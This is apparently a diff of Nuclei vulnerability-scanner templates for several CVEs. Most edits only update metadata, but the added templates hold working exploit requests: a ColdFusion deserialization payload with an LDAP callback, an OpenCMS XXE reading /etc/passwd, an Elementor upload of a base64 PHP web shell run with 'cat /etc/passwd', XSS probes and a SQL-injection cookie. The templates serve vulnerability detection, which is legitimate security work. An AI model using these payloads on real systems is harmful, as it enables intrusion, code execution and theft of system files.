cpe: cpe:2.3:a:rstudio:connect:*:*:*:*:*:*:*:*
|
|
||||||
metadata:
|
metadata:
|
||||||
|
product: connect
|
||||||
|
shodan-query: "http.favicon.hash:217119619"
|
||||||
|
fofa-query: "app=\"RStudio-Connect\""
|
||||||
|
max-request: 1
|
||||||
verified: true
|
verified: true
|
||||||
vendor: rstudio
|
vendor: rstudio
|
||||||
product: connect
|
|
||||||
shodan-query: http.favicon.hash:217119619
|
|
||||||
fofa-query: app="RStudio-Connect"
|
|
||||||
tags: tenable,cve,cve2022,redirect,rstudio
|
tags: tenable,cve,cve2022,redirect,rstudio
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
@ -46,4 +47,4 @@ http:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 307
|
- 307
|
||||||
# digest: 4a0a00473045022100e9632f43574d44779bc09a10a78cb6835cc4b0179a707b395efecda59dcb8b5402205a72129b99d873d786c6aa9062e142a0b02192b31aa930c1a234a6d61558b479:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100aed598584561fa1188599f4a3fa2ff5ae9149e94b624fef3be306a7a74429c3f02201c02b4ebc6bfa15076a56527dc53df6e0be1e5d7f890dbc1558b26e30d35059b:922c64590222798bb761d5b6d8e72950
|
|
@ -18,8 +18,8 @@ info:
|
||||||
cvss-score: 7.5
|
cvss-score: 7.5
|
||||||
cve-id: CVE-2022-4140
|
cve-id: CVE-2022-4140
|
||||||
cwe-id: CWE-552
|
cwe-id: CWE-552
|
||||||
epss-score: 0.01317
|
epss-score: 0.00932
|
||||||
epss-percentile: 0.84504
|
epss-percentile: 0.82572
|
||||||
cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:*
|
cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:*
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
|
@ -54,4 +54,4 @@ http:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
# digest: 4b0a00483046022100c309f56d1bc6b8b3ad4aeedfea6624e9072d042193f145856563965410ce9e7c022100cc3f6acff92ea09cb461e67964a2e5973fbb82fdd391e5176e287a0be8c759c1:922c64590222798bb761d5b6d8e72950
|
# digest: 490a0046304402200691e9b2e104e67432ef4041648aca88eaa5a1fc58bbc764da8a0cf8240733da022015c0a0d07bcd6552d8c77f685c7c9bc595e3e7e9f3d8bf9b201968fcd4af75b4:922c64590222798bb761d5b6d8e72950
|
|
@ -17,7 +17,7 @@ info:
|
||||||
cve-id: CVE-2023-0552
|
cve-id: CVE-2023-0552
|
||||||
cwe-id: CWE-601
|
cwe-id: CWE-601
|
||||||
epss-score: 0.00086
|
epss-score: 0.00086
|
||||||
epss-percentile: 0.35637
|
epss-percentile: 0.34914
|
||||||
cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:*
|
cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:*
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
|
@ -38,4 +38,4 @@ http:
|
||||||
part: header
|
part: header
|
||||||
regex:
|
regex:
|
||||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'
|
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$'
|
||||||
# digest: 4a0a004730450221008eccfd0ecd7398b3566c5cfec47a5d3396899495831dabbee13a144918b2127e0220232a7e35aba58e28f2c38ac75f7f4558d7419e63c82e7b145dba6569f3e52fcf:922c64590222798bb761d5b6d8e72950
|
# digest: 490a0046304402201ab8dcd9693d8e9c7b7e3c2ac162de7610f21d7c3523e623a005ecdeababa57902203039fe388db8f4aef6c49c40a2cff545792484a6dda13261675b612810c874f9:922c64590222798bb761d5b6d8e72950
|
|
@ -28,7 +28,7 @@ info:
|
||||||
vendor: citrix
|
vendor: citrix
|
||||||
product: sharefile_storage_zones_controller
|
product: sharefile_storage_zones_controller
|
||||||
shodan-query: title:"ShareFile Storage Server"
|
shodan-query: title:"ShareFile Storage Server"
|
||||||
tags: cve2023,cve,sharefile,rce,intrusive,fileupload,brute-force,kev,citrix
|
tags: cve2023,cve,sharefile,rce,intrusive,fileupload,bruteforce,kev,citrix
|
||||||
variables:
|
variables:
|
||||||
fileName: '{{rand_base(8)}}'
|
fileName: '{{rand_base(8)}}'
|
||||||
|
|
||||||
|
@ -61,4 +61,4 @@ http:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
- 'BaseURL+ "/cifs/" + fileName + ".aspx"'
|
- 'BaseURL+ "/cifs/" + fileName + ".aspx"'
|
||||||
# digest: 4a0a00473045022100b8908e3d0d507eafb4daa66943662e7f35d530024af777cd331040b9eda4540d022022868e31a2dbfcfb4347f872741b77feac8ac0a89509d5d3fc045ecd373c196d:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a0047304502205ab85a74f3c255c163c9d99bda2ff69666328d81782c9b4a8c2bc1d63128106b022100c10ae18b7db4ed08a5e2b324af93397140801b423282274cc2cbe4ddb0e93b0a:922c64590222798bb761d5b6d8e72950
|
|
@ -22,7 +22,7 @@ info:
|
||||||
cve-id: CVE-2023-26255
|
cve-id: CVE-2023-26255
|
||||||
cwe-id: CWE-22
|
cwe-id: CWE-22
|
||||||
epss-score: 0.15138
|
epss-score: 0.15138
|
||||||
epss-percentile: 0.95348
|
epss-percentile: 0.95663
|
||||||
cpe: cpe:2.3:a:stagil:stagil_navigation:*:*:*:*:*:jira:*:*
|
cpe: cpe:2.3:a:stagil:stagil_navigation:*:*:*:*:*:jira:*:*
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
max-request: 1
|
||||||
|
@ -52,4 +52,4 @@ http:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
# digest: 4a0a0047304502203d3f6c5452e186ee057389d3819be8e0fb41db7582a366b90ee39072f3c7d77f022100a9a161043ec3d29f43d105a2fd562bb509c5f7b85392ff6516cb29dde828f5b9:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a004730450221009eff1cfcd9afb5c04d7b263baaf2ff4faf43631d4e6eaf033ca3c6b8fd85de5d022060065320c9d8eac58e06f71ddabfeaecb433875fa230c89a4015e129415c44f3:922c64590222798bb761d5b6d8e72950
|
|
@ -6,28 +6,29 @@ info:
|
||||||
severity: critical
|
severity: critical
|
||||||
description: |
|
description: |
|
||||||
The Gift Cards (Gift Vouchers and Packages) WordPress Plugin, version <= 4.3.1, is affected by an unauthenticated SQL injection vulnerability in the template parameter in the wpgv_doajax_voucher_pdf_save_func action.
|
The Gift Cards (Gift Vouchers and Packages) WordPress Plugin, version <= 4.3.1, is affected by an unauthenticated SQL injection vulnerability in the template parameter in the wpgv_doajax_voucher_pdf_save_func action.
|
||||||
impact: |
|
|
||||||
Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
|
|
||||||
remediation: |
|
|
||||||
Update the Gift Cards (Gift Vouchers and Packages) WordPress Plugin to the latest version available.
|
|
||||||
reference:
|
reference:
|
||||||
- https://www.tenable.com/security/research/tra-2023-2
|
- https://www.tenable.com/security/research/tra-2023-2
|
||||||
- https://wordpress.org/plugins/gift-voucher/
|
- https://wordpress.org/plugins/gift-voucher/
|
||||||
- https://github.com/ARPSyndicate/cvemon
|
- https://github.com/ARPSyndicate/cvemon
|
||||||
- https://github.com/JoshuaMart/JoshuaMart
|
- https://github.com/JoshuaMart/JoshuaMart
|
||||||
|
impact: |
|
||||||
|
Successful exploitation of this vulnerability could allow an attacker to perform SQL injection attacks, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.
|
||||||
|
remediation: |
|
||||||
|
Update the Gift Cards (Gift Vouchers and Packages) WordPress Plugin to the latest version available.
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
cvss-score: 9.8
|
cvss-score: 9.8
|
||||||
cve-id: CVE-2023-28662
|
cve-id: CVE-2023-28662
|
||||||
cwe-id: CWE-89
|
cwe-id: CWE-89
|
||||||
|
cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:*
|
||||||
epss-score: 0.00076
|
epss-score: 0.00076
|
||||||
epss-percentile: 0.31593
|
epss-percentile: 0.31593
|
||||||
cpe: cpe:2.3:a:codemenschen:gift_vouchers:*:*:*:*:*:wordpress:*:*
|
|
||||||
metadata:
|
metadata:
|
||||||
vendor: codemenschen
|
vendor: codemenschen
|
||||||
product: gift_vouchers
|
product: "gift_vouchers"
|
||||||
framework: wordpress
|
framework: wordpress
|
||||||
fofa-query: body="/wp-content/plugins/gift-voucher/"
|
fofa-query: "body=\"/wp-content/plugins/gift-voucher/\""
|
||||||
|
max-request: 2
|
||||||
tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,unauth,gift-voucher
|
tags: cve,cve2023,wordpress,wp,wp-plugin,sqli,unauth,gift-voucher
|
||||||
|
|
||||||
flow: http(1) && http(2)
|
flow: http(1) && http(2)
|
||||||
|
@ -59,4 +60,4 @@ http:
|
||||||
- status_code == 500
|
- status_code == 500
|
||||||
- contains(body, 'critical error')
|
- contains(body, 'critical error')
|
||||||
condition: and
|
condition: and
|
||||||
# digest: 490a00463044022009c58d25fec3c30e1ad3887484383645315f8e71fe821a509bf323cff77eb615022072f0bfae8790782eb15f69313e0ba60c76e9b1431b1bd18cf6842ca56ad685a9:922c64590222798bb761d5b6d8e72950
|
# digest: 4b0a00483046022100897f4b8dcfa22ad10a9b4881331ba0166610d2d1f177506cf60e47094c3bfbea022100b256673611bdf13504dc6bf1875ba960441fb7f9bb60ec748474e98d2c76d3fc:922c64590222798bb761d5b6d8e72950
|
|
@ -13,13 +13,14 @@ info:
|
||||||
- https://twitter.com/wvuuuuuuuuuuuuu/status/1694956245742923939
|
- https://twitter.com/wvuuuuuuuuuuuuu/status/1694956245742923939
|
||||||
- https://forums.ivanti.com/s/article/Avalanche-Vulnerabilities-Addressed-in-6-4-1?language=en_US
|
- https://forums.ivanti.com/s/article/Avalanche-Vulnerabilities-Addressed-in-6-4-1?language=en_US
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-32563
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-32563
|
||||||
|
- https://github.com/mayur-esh/vuln-liners
|
||||||
classification:
|
classification:
|
||||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
cvss-score: 9.8
|
cvss-score: 9.8
|
||||||
cve-id: CVE-2023-32563
|
cve-id: CVE-2023-32563
|
||||||
cwe-id: CWE-22
|
cwe-id: CWE-22
|
||||||
epss-score: 0.43261
|
epss-score: 0.42647
|
||||||
epss-percentile: 0.97013
|
epss-percentile: 0.97218
|
||||||
cpe: cpe:2.3:a:ivanti:avalanche:*:*:*:*:*:*:*:*
|
cpe: cpe:2.3:a:ivanti:avalanche:*:*:*:*:*:*:*:*
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 2
|
max-request: 2
|
||||||
|
@ -56,4 +57,4 @@ http:
|
||||||
part: body_2
|
part: body_2
|
||||||
words:
|
words:
|
||||||
- "CVE-2023-32563"
|
- "CVE-2023-32563"
|
||||||
# digest: 4b0a0048304602210095f0377361174bf0f18bb6b480904a01bad012dd184abcf963d328e084a7cf45022100aa4c0a0aad45a19e6fb8fd3dc956cc89ac088f8ed744c630eb9b9cd5d1ad38ee:922c64590222798bb761d5b6d8e72950
|
# digest: 490a004630440220277c51026fc6ee497604b9edf835b895ebb5f041702564b51386e1aff926cdd502206a64318799d865c7590bca991daf364669b8257fa8d74439d3aada9f801eb608:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,52 @@
|
||||||
|
id: CVE-2023-38203
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Adobe ColdFusion - Deserialization of Untrusted Data
|
||||||
|
author: yiran
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.
|
||||||
|
impact: |
|
||||||
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
|
||||||
|
remediation: |
|
||||||
|
Upgrade to Adobe ColdFusion version ColdFusion 2018 Update 18, ColdFusion 2021 Update 8, ColdFusion 2023 Update2 or later to mitigate this vulnerability.
|
||||||
|
reference:
|
||||||
|
- https://blog.projectdiscovery.io/adobe-coldfusion-rce/
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-38203
|
||||||
|
- https://github.com/Ostorlab/KEV
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2023-38203
|
||||||
|
cwe-id: CWE-502
|
||||||
|
epss-score: 0.517
|
||||||
|
epss-percentile: 0.97465
|
||||||
|
cpe: cpe:2.3:a:adobe:coldfusion:2018:-:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
vendor: adobe
|
||||||
|
product: coldfusion
|
||||||
|
shodan-query: http.component:"Adobe ColdFusion"
|
||||||
|
fofa-query: app="Adobe-ColdFusion"
|
||||||
|
tags: cve,cve2023,adobe,rce,coldfusion,deserialization,kev
|
||||||
|
|
||||||
|
variables:
|
||||||
|
callback: "{{interactsh-url}}"
|
||||||
|
jndi: "ldap%3a//{{callback}}/zdfzfd"
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /CFIDE/adminapi/base.cfc?method= HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
argumentCollection=<wddxPacket+version%3d'1.0'><header/><data><struct+type%3d'xcom.sun.rowset.JdbcRowSetImplx'><var+name%3d'dataSourceName'><string>{{jndi}}</string></var><var+name%3d'autoCommit'><boolean+value%3d'true'/></var></struct></data></wddxPacket>
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- contains(interactsh_protocol, "dns")
|
||||||
|
- contains(body, "ColdFusion documentation")
|
||||||
|
condition: and
|
||||||
|
# digest: 490a0046304402203c66abf1d15e27f2367ab893430e1e93755ed0bc0192120015a9ccd034b1c5e3022056f16b7ba4c51d0bd6e741d47e92f84e7d7e63c54708dd3600bb37c9789e887a:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,48 @@
|
||||||
|
id: CVE-2023-40355
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Axigen WebMail - Cross-Site Scripting
|
||||||
|
author: amir-h-fallahi
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Cross Site Scripting (XSS) vulnerability in Axigen versions 10.3.3.0 before 10.3.3.59, 10.4.0 before 10.4.19, and 10.5.0 before 10.5.5, allows authenticated attackers to execute arbitrary code and obtain sensitive information via the logic for switching between the Standard and Ajax versions.
|
||||||
|
reference:
|
||||||
|
- https://www.axigen.com/knowledgebase/Axigen-WebMail-XSS-Vulnerability-CVE-2023-40355-_396.html
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-40355
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
|
||||||
|
cvss-score: 6.5
|
||||||
|
cve-id: CVE-2023-40355
|
||||||
|
cwe-id: CWE-79
|
||||||
|
epss-score: 0.0006
|
||||||
|
epss-percentile: 0.22931
|
||||||
|
metadata:
|
||||||
|
max-request: 3
|
||||||
|
verified: true
|
||||||
|
shodan-query: http.favicon.hash:-1247684400
|
||||||
|
tags: cve,cve2023,xss,axigen,webmail
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.hsp?passwordExpired=yes&username=\\'-alert(document.domain),//"
|
||||||
|
- "{{BaseURL}}/index.hsp?passwordExpired=yes&domainName=\\'-alert(document.domain),//"
|
||||||
|
- "{{BaseURL}}/index.hsp?m=',alert(document.domain),'"
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "\\\\'-alert(document.domain),//"
|
||||||
|
- "',alert(document.domain),'"
|
||||||
|
condition: or
|
||||||
|
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains(header, "text/html")'
|
||||||
|
- 'contains(response, "Axigen")'
|
||||||
|
- 'status_code == 200'
|
||||||
|
condition: and
|
||||||
|
# digest: 4a0a004730450220183b57c2a71cd7ef299bd414a8937c4136c8b85301e19179a0c81d9e03454d94022100dafbcf2eb06bc385aa209e451c3cde44a73316a406d1ddb139523148c439adbd:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,39 @@
|
||||||
|
id: CVE-2023-42344
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: OpenCMS - XML external entity (XXE)
|
||||||
|
author: 0xr2r
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
users can execute code without authentication. An attacker can execute malicious requests on the OpenCms server. When the requests are successful vulnerable OpenCms can be exploited resulting in an unauthenticated XXE vulnerability. Based on research OpenCMS versions from 9.0.0 to 10.5.0 are vulnerable.
|
||||||
|
reference:
|
||||||
|
- https://blog.qualys.com/product-tech/2023/12/08/opencms-unauthenticated-xxe-vulnerability-cve-2023-42344
|
||||||
|
- https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/
|
||||||
|
remediation: Advised to upgrade to OpenCMS 10.5.1 or later to patch the vulnerability
|
||||||
|
metadata:
|
||||||
|
max-request: 2
|
||||||
|
fofa-query: "OpenCms-9.5.3"
|
||||||
|
verified: true
|
||||||
|
tags: cve,cve2023,xxe,opencms
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: POST
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/opencms/cmisatom/cmis-online/query"
|
||||||
|
- "{{BaseURL}}/cmisatom/cmis-online/query"
|
||||||
|
headers:
|
||||||
|
Content-Type: "application/xml;charset=UTF-8"
|
||||||
|
Referer: "{{RootURL}}"
|
||||||
|
body: |
|
||||||
|
<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><cmis:query xmlns:cmis="<http://docs.oasis-open.org/ns/cmis/core/200908/>"><cmis:statement>&test;</cmis:statement><cmis:searchAllVersions>false</cmis:searchAllVersions><cmis:includeAllowableActions>false</cmis:includeAllowableActions><cmis:includeRelationships>none</cmis:includeRelationships><cmis:renditionFilter>cmis:none</cmis:renditionFilter><cmis:maxItems>100</cmis:maxItems><cmis:skipCount>0</cmis:skipCount></cmis:query>
|
||||||
|
|
||||||
|
stop-at-first-match: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
regex:
|
||||||
|
- "root:.*:0:0:"
|
||||||
|
- "invalidArgument"
|
||||||
|
condition: and
|
||||||
|
# digest: 4a0a0047304502207dccf8dee9a6e05f16f56533d13329cf5bb1cac34d72692fef62fd33077527e20221009e14b0264ffda37db9a79c357a04a6512985d7c64cc6157addf5246d2ec24d1e:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,38 @@
|
||||||
|
id: CVE-2023-45671
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Frigate < 0.13.0 Beta 3 - Cross-Site Scripting
|
||||||
|
author: ritikchaddha
|
||||||
|
severity: medium
|
||||||
|
description: |
|
||||||
|
Frigate is an open source network video recorder. Before version 0.13.0 Beta 3, there is a reflected cross-site scripting vulnerability in any API endpoints reliant on the `/<camera_name>` base path as values provided for the path are not sanitized. Exploiting this vulnerability requires the attacker to both know very specific information about a user's Frigate server and requires an authenticated user to be tricked into clicking a specially crafted link to their Frigate instance. This vulnerability could exploited by an attacker under the following circumstances: Frigate publicly exposed to the internet (even with authentication); attacker knows the address of a user's Frigate instance; attacker crafts a specialized page which links to the user's Frigate instance; attacker finds a way to get an authenticated user to visit their specialized page and click the button/link. As the reflected values included in the URL are not sanitized or escaped, this permits execution arbitrary Javascript payloads. Version 0.13.0 Beta 3 contains a patch for this issue.
|
||||||
|
remediation: It has been fixed in version 0.13.0 Beta 3
|
||||||
|
reference:
|
||||||
|
- https://github.com/blakeblackshear/frigate/security/advisories/GHSA-jjxc-m35j-p56f
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-45671
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||||
|
cvss-score: 4.7
|
||||||
|
cve-id: CVE-2023-45671
|
||||||
|
cpe: cpe:2.3:a:frigate:frigate:0.13.0:beta1:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
vendor: frigate
|
||||||
|
product: frigate
|
||||||
|
shodan-query: title:"Frigate"
|
||||||
|
tags: cve,cve2023,frigate,xss
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/api/%3Cimg%20src=%22%22%20onerror=alert(document.domain)%3E"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- 'contains(body, "Camera named <img src=\"\" onerror=alert(document.domain)>")'
|
||||||
|
- 'contains(header, "text/html")'
|
||||||
|
- 'status_code == 404'
|
||||||
|
condition: and
|
||||||
|
# digest: 4b0a00483046022100cba5c4d12e50a528bb189f495e3c9da2618e5180146b4624cd3997b834063fe60221009b11601e94531407edaa7ee1e9dfb799e2167598089b2ddcdac99db6d1c3736f:922c64590222798bb761d5b6d8e72950
|
|
@ -16,8 +16,9 @@ info:
|
||||||
cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*
|
cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:*
|
||||||
metadata:
|
metadata:
|
||||||
vendor: ivanti
|
vendor: ivanti
|
||||||
product: connect_secure
|
product: "connect_secure"
|
||||||
shodan-query: html:"welcome.cgi?p=logo"
|
shodan-query: "html:\"welcome.cgi?p=logo\""
|
||||||
|
max-request: 2
|
||||||
tags: cve,cve2023,kev,auth-bypass,ivanti
|
tags: cve,cve2023,kev,auth-bypass,ivanti
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
@ -48,4 +49,4 @@ http:
|
||||||
- 'contains(body_2, "block_message")'
|
- 'contains(body_2, "block_message")'
|
||||||
- 'contains(header_2, "application/json")'
|
- 'contains(header_2, "application/json")'
|
||||||
condition: and
|
condition: and
|
||||||
# digest: 490a0046304402204614c79e65441e3043a41452c64e73db844daaec0a04ff4ec5d9999c51825f83022077d76a1a7ab3b0ab8fb364824bfe94bcf6ad07ef3fc21736ac56399d12397a58:922c64590222798bb761d5b6d8e72950
|
# digest: 490a0046304402204ad3fa1c2d287f2d56aad453123f1b51f179ee3f12ab4a01a78e376c8d3de46b022044b7912e398ea01a9fb5d948d162710fb8ece66b2fc48b8a9c82b38568a12c03:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,62 @@
|
||||||
|
id: CVE-2023-48777
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: WordPress Elementor 3.18.1 - File Upload/Remote Code Execution
|
||||||
|
author: DhiyaneshDK
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server.
|
||||||
|
remediation: Fixed in 3.18.2
|
||||||
|
reference:
|
||||||
|
- https://wpscan.com/vulnerability/a6b3b14c-f06b-4506-9b88-854f155ebca9/
|
||||||
|
metadata:
|
||||||
|
verified: true
|
||||||
|
max-request: 4
|
||||||
|
framework: wordpress
|
||||||
|
publicwww-query: "/wp-content/plugins/elementor/"
|
||||||
|
tags: cve,cve2023,elementor,file-upload,intrusive,rce,wpscan,wordpress,wp-plugin,authenticated
|
||||||
|
|
||||||
|
variables:
|
||||||
|
filename: "{{rand_base(6)}}"
|
||||||
|
payload: '{"import_template":{"action":"import_template","data":{"fileName":"/../../../../{{filename}}.php","fileData":"PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKTsgPz4="}}}'
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /wp-login.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-admin/post.php?post=1&action=elementor HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
actions={{url_encode(payload)}}&_nonce={{nonce}}&editor_post_id=1&initial_document_id=1&action=elementor_ajax
|
||||||
|
|
||||||
|
- |
|
||||||
|
GET /wp-content/{{filename}}.php?cmd=cat+/etc/passwd HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- "regex('root:.*:0:0:', body_4)"
|
||||||
|
- "status_code_4 == 200"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
internal: true
|
||||||
|
name: nonce
|
||||||
|
part: body
|
||||||
|
group: 1
|
||||||
|
regex:
|
||||||
|
- 'admin\\\/admin\-ajax\.php","nonce":"([0-9a-z]+)"'
|
||||||
|
# digest: 4b0a00483046022100b71e9b31dece4dcf31fbd4629f0aea2339c0ec8922cf20066400a2d2232bca0c02210091ea465a635a3c4c909c86e44122140e35c0f0fc6fb70e2e4182abe48c32c568:922c64590222798bb761d5b6d8e72950
|
|
@ -14,14 +14,15 @@ info:
|
||||||
cvss-score: 5.4
|
cvss-score: 5.4
|
||||||
cve-id: CVE-2023-52085
|
cve-id: CVE-2023-52085
|
||||||
cwe-id: CWE-22
|
cwe-id: CWE-22
|
||||||
|
cpe: cpe:2.3:a:wintercms:winter:*:*:*:*:*:*:*:*
|
||||||
epss-score: 0.00046
|
epss-score: 0.00046
|
||||||
epss-percentile: 0.12483
|
epss-percentile: 0.12483
|
||||||
cpe: cpe:2.3:a:wintercms:winter:*:*:*:*:*:*:*:*
|
|
||||||
metadata:
|
metadata:
|
||||||
vendor: wintercms
|
vendor: wintercms
|
||||||
product: winter
|
product: winter
|
||||||
shodan-query: title:"Winter CMS"
|
shodan-query: "title:\"Winter CMS\""
|
||||||
fofa-query: title="Winter CMS"
|
fofa-query: "title=\"Winter CMS\""
|
||||||
|
max-request: 4
|
||||||
tags: cve,cve2023,authenticated,lfi,wintercms
|
tags: cve,cve2023,authenticated,lfi,wintercms
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
@ -68,4 +69,4 @@ http:
|
||||||
regex:
|
regex:
|
||||||
- '<input name="_token" type="hidden" value="([0-9a-zA-Z]{40})">'
|
- '<input name="_token" type="hidden" value="([0-9a-zA-Z]{40})">'
|
||||||
internal: true
|
internal: true
|
||||||
# digest: 490a0046304402205dc4e3489b8db4f6e587d569813f9eec4372432d2ed1350de8d8bc00c7d01a8d02207363f5db9a634f3a0973e7e364948a39da565ec0b5ea0f3ac1276c0fc7027331:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100edda67cd80bdd516aa4f6241fa72a9e1d6c1e240eb1d40d35ae9c44143ff025902206f496f8d850ad284d589527d8abd90bf13aa0414c007dad56d79ba9c57d33c59:922c64590222798bb761d5b6d8e72950
|
|
@ -48,13 +48,13 @@ http:
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/wp-login.php"
|
- "{{BaseURL}}/wp-login.php"
|
||||||
headers:
|
headers:
|
||||||
Cookie: wordpress_logged_in=" AND (SELECT 5025 FROM (SELECT(SLEEP(5)))NkcI) AND "tqKU"="tqKU
|
Cookie: wordpress_logged_in=" AND (SELECT 5025 FROM (SELECT(SLEEP(7)))NkcI) AND "tqKU"="tqKU
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
- 'duration>=5'
|
- 'duration>=7'
|
||||||
- 'status_code == 200'
|
- 'status_code == 200'
|
||||||
- 'contains(body, "wp-admin")'
|
- 'contains(body, "wp-admin")'
|
||||||
condition: and
